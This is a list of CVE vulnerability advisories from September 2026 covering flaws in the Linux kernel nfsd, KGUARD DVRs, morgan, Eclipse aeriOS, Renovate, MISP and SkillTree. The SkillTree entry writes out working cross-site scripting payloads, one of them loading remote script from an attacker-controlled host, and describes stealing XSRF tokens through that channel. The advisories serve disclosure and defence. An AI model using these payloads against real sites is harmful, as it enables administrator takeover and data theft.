| CVE-2026-89671 | 1 Linux | 1 Linux Kernel | 2026-09-14 | 9.1 Critical |
| In the Linux kernel, the following vulnerability has been resolved: nfsd: gate nfs3 setacl by argp->mask nfsd3_proc_setacl() calls set_posix_acl() unconditionally for both ACL_TYPE_ACCESS and ACL_TYPE_DEFAULT, passing argp->acl_access and argp->acl_default verbatim. The NFSv3 ACL decoder only populates those pointers when the corresponding mask bit is set: nfs3svc_decode_setaclargs() if (args->mask & NFS_ACL) decode into acl_access if (args->mask & NFS_DFACL) decode into acl_default /* otherwise the pointer stays NULL (pc_argzero) */ nfsd3_proc_setacl() set_posix_acl(.., ACL_TYPE_ACCESS, argp->acl_access) set_posix_acl(.., ACL_TYPE_DEFAULT, argp->acl_default) set_posix_acl(idmap, dentry, type, NULL) is the VFS "remove this ACL type" operation. A NULL pointer that means "the client did not send this arm" is therefore indistinguishable from "the client asked to remove this ACL". A SETACL with mask=NFS_ACL silently drops the directory's default ACL; mask=0 drops both. The sibling nfsd3_proc_getacl() already consults argp->mask before touching each arm; mirror that in setacl. Fix by wrapping each set_posix_acl() call in the matching mask bit check and initializing error to 0 before inode_lock so that a request with neither bit set leaves the on-disk ACLs untouched and returns nfs_ok. The out_drop_lock path and the unconditional posix_acl_release() at out: are preserved; both NULL-tolerate the skipped arms. | ||||

| CVE-2026-87827 | 1 Kguard | 1 Kguard Firmware | 2026-09-13 | N/A |
| Certain KGUARD DVR devices running vulnerable firmware expose a system command execution service on all network interfaces without requiring authentication. A remote unauthenticated attacker with network access to the affected service can execute arbitrary system commands on the device, potentially resulting in complete compromise of the DVR. The vulnerability is known to have been exploited in the wild by the Mirai_ptea (Rimasuta) and Mirai_aurora botnets for malware propagation and subsequent DDoS activity. The vulnerability was reported to affect firmware dating from 2016, while firmware released after 2017 appears to mitigate the issue by restricting the affected service to the localhost interface (127.0.0.1) instead of exposing it on all interfaces (0.0.0.0). The affected-device list reported by Netlab includes many D1004NR, D1008NR, D1016NR, D1104, D1104NR, D1108NR, D1116NR, D1132NR, D2116NR, D97xx, D98xx, and D99xx variants and several associated hardware revisions The exploit is included in some version of rapperbot and exploited in 2026. This assignment has been made to document the active exploitation and lack of documentation from the vendor. | ||||

| CVE-2026-87859 | 1 Morgan | 1 Morgan | 2026-09-11 | 5.3 Medium |
| morgan is an HTTP request logger middleware for Node.js. In versions before 1.12.1, its escapeLogField() function does not escape the double quote character, which delimits the quoted fields of the Apache combined log format that morgan emits. An unauthenticated remote attacker who controls a value written to a quoted field, such as the User-Agent or Referer header, can include a double quote to close that field early, so a log consumer that parses the log by field position reads attacker-supplied text as the following field. In the built-in formats this makes the recorded value differ from the value that was sent, and in custom formats that quote an attacker-controlled token before a server-controlled one it can forge values such as the response status. No newline is injected, so record separation stays intact. The issue is fixed in morgan 1.12.1, which escapes the double quote. Users should upgrade to morgan 1.12.1 or later. | ||||
| CVE-2026-86464 | 1 Eclipse | 1 Aerios | 2026-09-11 | N/A |
| In the current development version of Eclipse aeriOS, for which no official release has yet been published, the Identity Manager (IdM) deployment included insecure default configurations and credentials for security-sensitive services. The Helm chart exposed the Keycloak service and its PostgreSQL backing database through Kubernetes NodePort services by default, while the Docker Compose deployment similarly exposed PostgreSQL on all network interfaces. The deployment included fixed default credentials for the Keycloak administrator and PostgreSQL database user, and the previous Helm chart configuration did not provide adequate secret management for these credentials. In addition, predefined application users with known credentials were provided for development and testing without sufficiently warning operators against their use in production environments. An attacker able to reach the exposed services could use the published default credentials to obtain administrative access to the Identity Manager or direct access to its database. This could allow unauthorized access to or modification of identity-management data, including users, roles, client credentials, sessions, and cryptographic material, and could enable the creation of privileged identities or tokens accepted by other aeriOS components. The issue has been addressed by generating a random Keycloak administrator password by default, managing Keycloak and PostgreSQL credentials through Kubernetes Secrets, and restricting PostgreSQL to an internal service in both the Helm chart and Docker Compose deployment. OpenLDAP is also restricted to an internal service. The predefined users intended for development and testing are retained, but the documentation now explicitly warns that their default credentials must not be used in production and that these users should be removed or their credentials changed after installation. | ||||
| CVE-2026-88883 | 1 Renovatebot | 1 Renovate | 2026-09-11 | 7.7 High |
| Renovate is an automated dependency update tool. In versions before 44.14.4 (and Mend Renovate CE/EE images before 15.4.0 and the mend-renovate-enterprise-edition Helm chart before 10.4.0), log sanitisation for TLS private keys used for Mutual TLS was incomplete. While the value of hostRules[].httpsPrivateKey was redacted in the field itself, the same private key value was not redacted if it also appeared elsewhere — for example in another configuration option or in a log message under a key other than httpsPrivateKey — causing the full private key to be written to Renovate's logs in cleartext. This affects deployments that configure Mutual TLS through hostRules[].httpsPrivateKey without passing the value through the documented `secrets` configuration. Anyone able to read the resulting logs can recover the private key. The issue is fixed in Renovate 44.14.4, which redacts any value supplied as hostRules[].httpsPrivateKey wherever it appears in the logs; as a workaround, supply the key via the `secrets` configuration. | ||||

| CVE-2026-88921 | 1 Misp | 1 Misp | 2026-09-11 | N/A |
| MISP contains an HTML injection vulnerability in the MISPElementHTMLFormatterTool component, which is responsible for rendering MISP element references (attributes, objects, and tags) into inline HTML during PDF report export via the convert_markdown_to_pdf module. The attribute(), objectAttribute(), object(), and tag() methods interpolated user-controlled fields (attribute type, attribute value, object name, object relation, tag name, tag colour, and tag text colour) directly into HTML templates without applying HTML entity encoding. An authenticated user with the ability to create or modify MISP attributes, objects, or tags could embed arbitrary HTML markup in these fields. When a report containing such elements was exported to PDF, the unescaped content was rendered as live HTML rather than inert text, potentially injecting script tags, breaking the document structure, or altering the visual content of the exported report. Additionally, the attribute() method contained a template with hardcoded sample values ("domain-ip" and "google.com") instead of format placeholders, meaning every plain attribute reference in a PDF displayed the sample text rather than the actual indicator value, constituting a data-integrity defect in the exported document. The vulnerability requires an authenticated actor with write access to MISP elements and a subsequent PDF export of a report referencing those elements. The security impact is primarily to the integrity of the exported document and, depending on the HTML-to-PDF rendering engine, potential execution of injected markup during the conversion step. Version affected: ≤2.5.45 | ||||

| CVE-2026-54694 | 1 Nationalsecurityagency | 1 Skills-service | 2026-09-10 | 9.6 Critical |
| SkillTree is a micro-learning gamification platform. Prior to version 4.4.2, two independent code flaws combine into a single exploitable attack chain, with three distinct exploitation paths of escalating impact. `StringHighlighter.js` builds an HTML string by interpolating raw `value` substrings directly into a template literal with no HTML entity encoding. `HighlightedValue.vue` renders that string — and all unfiltered plain values — via Vue's `v-html` directive, which sets `innerHTML`. Separately, the account registration endpoint accepts `firstName`, `lastName`, and `nickname` fields and stores them without any HTML sanitization. An attacker self-registers with `firstName = "<img src=x onerror=alert(1)>"` (28 characters — within the 30-character field limit) and visits any quiz. The next time an administrator opens the Quiz Runs page the payload executes in their browser. Three attack paths exist with escalating impact. The first is basic cross-site scripting. Any self-contained payload fitting the 30-character limit (e.g. `<img src=x onerror=alert(1)>`, which is 28 chars) fires automatically when the admin navigates to the runs page through normal use. Arbitrary code execution in the admin's browser is confirmed with zero extra steps. The second is remote script loading via `import()`. Using the split-field technique (`lastName = "<img src=x"`, `firstName = "onerror=import('//nsas.cc/p')>"`), the attacker loads a full JavaScript file from their server. The file has no size limit and can perform any admin action — delete all projects, create backdoor accounts, dump user data, install a keylogger. No phishing required. The only constraint is that the URL must fit in 11 characters (`//nsas.cc/p`). The third is full cross-site request forgery token theft. Using `eval(name)`, the attacker pre-sets `window.name` to a data-theft payload by sending the admin one redirect link first. The session cookie is `HttpOnly` and cannot be read via `document.cookie`; however, the XSRF token is readable and the attacker leverages same-origin execution to call admin APIs from inside the victim's browser, relaying the responses to an external server. No admin interaction beyond routine use is required. Version 4.4.2 contains a patch. | ||||
